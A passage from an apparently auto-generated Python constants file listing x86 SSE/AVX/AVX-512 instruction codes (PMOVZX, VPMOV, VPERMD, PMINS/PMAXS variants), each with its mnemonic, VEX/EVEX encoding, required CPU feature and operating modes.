``VEX.128.66.0F38.W0 2D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMASKMOVPD_YMM_YMM_M256: int = 2855
"""
``VMASKMOVPD ymm1, ymm2, m256``
``VEX.256.66.0F38.W0 2D /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSCALEFSS_XMM_K1Z_XMM_XMMM32_ER: int = 2856
"""
``VSCALEFSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.66.0F38.W0 2D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFSD_XMM_K1Z_XMM_XMMM64_ER: int = 2857
"""
``VSCALEFSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.66.0F38.W1 2D /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VMASKMOVPS_M128_XMM_XMM: int = 2858
"""
``VMASKMOVPS m128, xmm1, xmm2``
``VEX.128.66.0F38.W0 2E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMASKMOVPS_M256_YMM_YMM: int = 2859
"""
``VMASKMOVPS m256, ymm1, ymm2``
``VEX.256.66.0F38.W0 2E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMASKMOVPD_M128_XMM_XMM: int = 2860
"""
``VMASKMOVPD m128, xmm1, xmm2``
``VEX.128.66.0F38.W0 2F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMASKMOVPD_M256_YMM_YMM: int = 2861
"""
``VMASKMOVPD m256, ymm1, ymm2``
``VEX.256.66.0F38.W0 2F /r``
``AVX``
``16/32/64-bit``
"""
PMOVZXBW_XMM_XMMM64: int = 2862
"""
``PMOVZXBW xmm1, xmm2/m64``
``66 0F 38 30 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXBW_XMM_XMMM64: int = 2863
"""
``VPMOVZXBW xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 30 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXBW_YMM_XMMM128: int = 2864
"""
``VPMOVZXBW ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 30 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXBW_XMM_K1Z_XMMM64: int = 2865
"""
``VPMOVZXBW xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.WIG 30 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVZXBW_YMM_K1Z_XMMM128: int = 2866
"""
``VPMOVZXBW ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.WIG 30 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVZXBW_ZMM_K1Z_YMMM256: int = 2867
"""
``VPMOVZXBW zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.WIG 30 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVWB_XMMM64_K1Z_XMM: int = 2868
"""
``VPMOVWB xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 30 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVWB_XMMM128_K1Z_YMM: int = 2869
"""
``VPMOVWB xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 30 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVWB_YMMM256_K1Z_ZMM: int = 2870
"""
``VPMOVWB ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 30 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMOVZXBD_XMM_XMMM32: int = 2871
"""
``PMOVZXBD xmm1, xmm2/m32``
``66 0F 38 31 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXBD_XMM_XMMM32: int = 2872
"""
``VPMOVZXBD xmm1, xmm2/m32``
``VEX.128.66.0F38.WIG 31 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXBD_YMM_XMMM64: int = 2873
"""
``VPMOVZXBD ymm1, xmm2/m64``
``VEX.256.66.0F38.WIG 31 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXBD_XMM_K1Z_XMMM32: int = 2874
"""
``VPMOVZXBD xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.WIG 31 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXBD_YMM_K1Z_XMMM64: int = 2875
"""
``VPMOVZXBD ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.WIG 31 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXBD_ZMM_K1Z_XMMM128: int = 2876
"""
``VPMOVZXBD zmm1 {k1}{z}, xmm2/m128``
``EVEX.512.66.0F38.WIG 31 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDB_XMMM32_K1Z_XMM: int = 2877
"""
``VPMOVDB xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 31 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDB_XMMM64_K1Z_YMM: int = 2878
"""
``VPMOVDB xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 31 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDB_XMMM128_K1Z_ZMM: int = 2879
"""
``VPMOVDB xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 31 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVZXBQ_XMM_XMMM16: int = 2880
"""
``PMOVZXBQ xmm1, xmm2/m16``
``66 0F 38 32 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXBQ_XMM_XMMM16: int = 2881
"""
``VPMOVZXBQ xmm1, xmm2/m16``
``VEX.128.66.0F38.WIG 32 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXBQ_YMM_XMMM32: int = 2882
"""
``VPMOVZXBQ ymm1, xmm2/m32``
``VEX.256.66.0F38.WIG 32 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXBQ_XMM_K1Z_XMMM16: int = 2883
"""
``VPMOVZXBQ xmm1 {k1}{z}, xmm2/m16``
``EVEX.128.66.0F38.WIG 32 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXBQ_YMM_K1Z_XMMM32: int = 2884
"""
``VPMOVZXBQ ymm1 {k1}{z}, xmm2/m32``
``EVEX.256.66.0F38.WIG 32 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXBQ_ZMM_K1Z_XMMM64: int = 2885
"""
``VPMOVZXBQ zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.WIG 32 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQB_XMMM16_K1Z_XMM: int = 2886
"""
``VPMOVQB xmm1/m16 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 32 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQB_XMMM32_K1Z_YMM: int = 2887
"""
``VPMOVQB xmm1/m32 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 32 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQB_XMMM64_K1Z_ZMM: int = 2888
"""
``VPMOVQB xmm1/m64 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 32 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVZXWD_XMM_XMMM64: int = 2889
"""
``PMOVZXWD xmm1, xmm2/m64``
``66 0F 38 33 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXWD_XMM_XMMM64: int = 2890
"""
``VPMOVZXWD xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 33 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXWD_YMM_XMMM128: int = 2891
"""
``VPMOVZXWD ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 33 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXWD_XMM_K1Z_XMMM64: int = 2892
"""
``VPMOVZXWD xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.WIG 33 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXWD_YMM_K1Z_XMMM128: int = 2893
"""
``VPMOVZXWD ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.WIG 33 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXWD_ZMM_K1Z_YMMM256: int = 2894
"""
``VPMOVZXWD zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.WIG 33 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDW_XMMM64_K1Z_XMM: int = 2895
"""
``VPMOVDW xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 33 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDW_XMMM128_K1Z_YMM: int = 2896
"""
``VPMOVDW xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 33 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVDW_YMMM256_K1Z_ZMM: int = 2897
"""
``VPMOVDW ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 33 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVZXWQ_XMM_XMMM32: int = 2898
"""
``PMOVZXWQ xmm1, xmm2/m32``
``66 0F 38 34 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXWQ_XMM_XMMM32: int = 2899
"""
``VPMOVZXWQ xmm1, xmm2/m32``
``VEX.128.66.0F38.WIG 34 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXWQ_YMM_XMMM64: int = 2900
"""
``VPMOVZXWQ ymm1, xmm2/m64``
``VEX.256.66.0F38.WIG 34 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXWQ_XMM_K1Z_XMMM32: int = 2901
"""
``VPMOVZXWQ xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.WIG 34 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXWQ_YMM_K1Z_XMMM64: int = 2902
"""
``VPMOVZXWQ ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.WIG 34 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXWQ_ZMM_K1Z_XMMM128: int = 2903
"""
``VPMOVZXWQ zmm1 {k1}{z}, xmm2/m128``
``EVEX.512.66.0F38.WIG 34 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQW_XMMM32_K1Z_XMM: int = 2904
"""
``VPMOVQW xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 34 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQW_XMMM64_K1Z_YMM: int = 2905
"""
``VPMOVQW xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 34 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQW_XMMM128_K1Z_ZMM: int = 2906
"""
``VPMOVQW xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 34 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVZXDQ_XMM_XMMM64: int = 2907
"""
``PMOVZXDQ xmm1, xmm2/m64``
``66 0F 38 35 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVZXDQ_XMM_XMMM64: int = 2908
"""
``VPMOVZXDQ xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 35 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVZXDQ_YMM_XMMM128: int = 2909
"""
``VPMOVZXDQ ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 35 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVZXDQ_XMM_K1Z_XMMM64: int = 2910
"""
``VPMOVZXDQ xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.W0 35 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXDQ_YMM_K1Z_XMMM128: int = 2911
"""
``VPMOVZXDQ ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.W0 35 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVZXDQ_ZMM_K1Z_YMMM256: int = 2912
"""
``VPMOVZXDQ zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.W0 35 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQD_XMMM64_K1Z_XMM: int = 2913
"""
``VPMOVQD xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 35 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQD_XMMM128_K1Z_YMM: int = 2914
"""
``VPMOVQD xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 35 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVQD_YMMM256_K1Z_ZMM: int = 2915
"""
``VPMOVQD ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 35 /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VPERMD_YMM_YMM_YMMM256: int = 2916
"""
``VPERMD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.W0 36 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPERMD_YMM_K1Z_YMM_YMMM256B32: int = 2917
"""
``VPERMD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 36 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2918
"""
``VPERMD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 36 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMQ_YMM_K1Z_YMM_YMMM256B64: int = 2919
"""
``VPERMQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 36 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPERMQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2920
"""
``VPERMQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 36 /r``
``AVX512F``
``16/32/64-bit``
"""
PCMPGTQ_XMM_XMMM128: int = 2921
"""
``PCMPGTQ xmm1, xmm2/m128``
``66 0F 38 37 /r``
``SSE4.2``
``16/32/64-bit``
"""
VEX_VPCMPGTQ_XMM_XMM_XMMM128: int = 2922
"""
``VPCMPGTQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 37 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPGTQ_YMM_YMM_YMMM256: int = 2923
"""
``VPCMPGTQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 37 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPGTQ_KR_K1_XMM_XMMM128B64: int = 2924
"""
``VPCMPGTQ k1 {k2}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 37 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPGTQ_KR_K1_YMM_YMMM256B64: int = 2925
"""
``VPCMPGTQ k1 {k2}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 37 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPGTQ_KR_K1_ZMM_ZMMM512B64: int = 2926
"""
``VPCMPGTQ k1 {k2}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 37 /r``
``AVX512F``
``16/32/64-bit``
"""
PMINSB_XMM_XMMM128: int = 2927
"""
``PMINSB xmm1, xmm2/m128``
``66 0F 38 38 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMINSB_XMM_XMM_XMMM128: int = 2928
"""
``VPMINSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 38 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINSB_YMM_YMM_YMMM256: int = 2929
"""
``VPMINSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 38 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINSB_XMM_K1Z_XMM_XMMM128: int = 2930
"""
``VPMINSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 38 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINSB_YMM_K1Z_YMM_YMMM256: int = 2931
"""
``VPMINSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 38 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINSB_ZMM_K1Z_ZMM_ZMMM512: int = 2932
"""
``VPMINSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 38 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2D_XMM_KR: int = 2933
"""
``VPMOVM2D xmm1, k1``
``EVEX.128.F3.0F38.W0 38 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVM2D_YMM_KR: int = 2934
"""
``VPMOVM2D ymm1, k1``
``EVEX.256.F3.0F38.W0 38 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVM2D_ZMM_KR: int = 2935
"""
``VPMOVM2D zmm1, k1``
``EVEX.512.F3.0F38.W0 38 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVM2Q_XMM_KR: int = 2936
"""
``VPMOVM2Q xmm1, k1``
``EVEX.128.F3.0F38.W1 38 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVM2Q_YMM_KR: int = 2937
"""
``VPMOVM2Q ymm1, k1``
``EVEX.256.F3.0F38.W1 38 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVM2Q_ZMM_KR: int = 2938
"""
``VPMOVM2Q zmm1, k1``
``EVEX.512.F3.0F38.W1 38 /r``
``AVX512DQ``
``16/32/64-bit``
"""
PMINSD_XMM_XMMM128: int = 2939
"""
``PMINSD xmm1, xmm2/m128``
``66 0F 38 39 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMINSD_XMM_XMM_XMMM128: int = 2940
"""
``VPMINSD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 39 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINSD_YMM_YMM_YMMM256: int = 2941
"""
``VPMINSD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 39 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINSD_XMM_K1Z_XMM_XMMM128B32: int = 2942
"""
``VPMINSD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 39 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINSD_YMM_K1Z_YMM_YMMM256B32: int = 2943
"""
``VPMINSD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 39 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2944
"""
``VPMINSD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 39 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINSQ_XMM_K1Z_XMM_XMMM128B64: int = 2945
"""
``VPMINSQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 39 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINSQ_YMM_K1Z_YMM_YMMM256B64: int = 2946
"""
``VPMINSQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 39 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINSQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2947
"""
``VPMINSQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 39 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVD2M_KR_XMM: int = 2948
"""
``VPMOVD2M k1, xmm1``
``EVEX.128.F3.0F38.W0 39 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVD2M_KR_YMM: int = 2949
"""
``VPMOVD2M k1, ymm1``
``EVEX.256.F3.0F38.W0 39 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVD2M_KR_ZMM: int = 2950
"""
``VPMOVD2M k1, zmm1``
``EVEX.512.F3.0F38.W0 39 /r``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVQ2M_KR_XMM: int = 2951
"""
``VPMOVQ2M k1, xmm1``
``EVEX.128.F3.0F38.W1 39 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVQ2M_KR_YMM: int = 2952
"""
``VPMOVQ2M k1, ymm1``
``EVEX.256.F3.0F38.W1 39 /r``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VPMOVQ2M_KR_ZMM: int = 2953
"""
``VPMOVQ2M k1, zmm1``
``EVEX.512.F3.0F38.W1 39 /r``
``AVX512DQ``
``16/32/64-bit``
"""
PMINUW_XMM_XMMM128: int = 2954
"""
``PMINUW xmm1, xmm2/m128``
``66 0F 38 3A /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMINUW_XMM_XMM_XMMM128: int = 2955
"""
``VPMINUW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINUW_YMM_YMM_YMMM256: int = 2956
"""
``VPMINUW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3A /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINUW_XMM_K1Z_XMM_XMMM128: int = 2957
"""
``VPMINUW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 3A /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINUW_YMM_K1Z_YMM_YMMM256: int = 2958
"""
``VPMINUW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 3A /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMINUW_ZMM_K1Z_ZMM_ZMMM512: int = 2959
"""
``VPMINUW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 3A /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMW2D_XMM_KR: int = 2960
"""
``VPBROADCASTMW2D xmm1, k1``
``EVEX.128.F3.0F38.W0 3A /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMW2D_YMM_KR: int = 2961
"""
``VPBROADCASTMW2D ymm1, k1``
``EVEX.256.F3.0F38.W0 3A /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMW2D_ZMM_KR: int = 2962
"""
``VPBROADCASTMW2D zmm1, k1``
``EVEX.512.F3.0F38.W0 3A /r``
``AVX512CD``
``16/32/64-bit``
"""
PMINUD_XMM_XMMM128: int = 2963
"""
``PMINUD xmm1, xmm2/m128``
``66 0F 38 3B /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMINUD_XMM_XMM_XMMM128: int = 2964
"""
``VPMINUD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMINUD_YMM_YMM_YMMM256: int = 2965
"""
``VPMINUD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3B /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMINUD_XMM_K1Z_XMM_XMMM128B32: int = 2966
"""
``VPMINUD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 3B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINUD_YMM_K1Z_YMM_YMMM256B32: int = 2967
"""
``VPMINUD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 3B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINUD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2968
"""
``VPMINUD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 3B /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINUQ_XMM_K1Z_XMM_XMMM128B64: int = 2969
"""
``VPMINUQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 3B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINUQ_YMM_K1Z_YMM_YMMM256B64: int = 2970
"""
``VPMINUQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 3B /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMINUQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2971
"""
``VPMINUQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 3B /r``
``AVX512F``
``16/32/64-bit``
"""
PMAXSB_XMM_XMMM128: int = 2972
"""
``PMAXSB xmm1, xmm2/m128``
``66 0F 38 3C /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMAXSB_XMM_XMM_XMMM128: int = 2973
"""
``VPMAXSB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXSB_YMM_YMM_YMMM256: int = 2974
"""
``VPMAXSB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3C /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXSB_XMM_K1Z_XMM_XMMM128: int = 2975
"""
``VPMAXSB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.WIG 3C /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXSB_YMM_K1Z_YMM_YMMM256: int = 2976
"""
``VPMAXSB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.WIG 3C /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMAXSB_ZMM_K1Z_ZMM_ZMMM512: int = 2977
"""
``VPMAXSB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.WIG 3C /r``
``AVX512BW``
``16/32/64-bit``
"""
PMAXSD_XMM_XMMM128: int = 2978
"""
``PMAXSD xmm1, xmm2/m128``
``66 0F 38 3D /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMAXSD_XMM_XMM_XMMM128: int = 2979
"""
``VPMAXSD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 3D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMAXSD_YMM_YMM_YMMM256: int = 2980
"""
``VPMAXSD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 3D /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMAXSD_XMM_K1Z_XMM_XMMM128B32: int = 2981
"""
``VPMAXSD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 3D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXSD_YMM_K1Z_YMM_YMMM256B32: int = 2982
"""
``VPMAXSD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 3D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXSD_ZMM_K1Z_ZMM_ZMMM512B32: int = 2983
"""
``VPMAXSD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 3D /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXSQ_XMM_K1Z_XMM_XMMM128B64: int = 2984
"""
``VPMAXSQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 3D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXSQ_YMM_K1Z_YMM_YMMM256B64: int = 2985
"""
``VPMAXSQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 3D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMAXSQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2986
"""
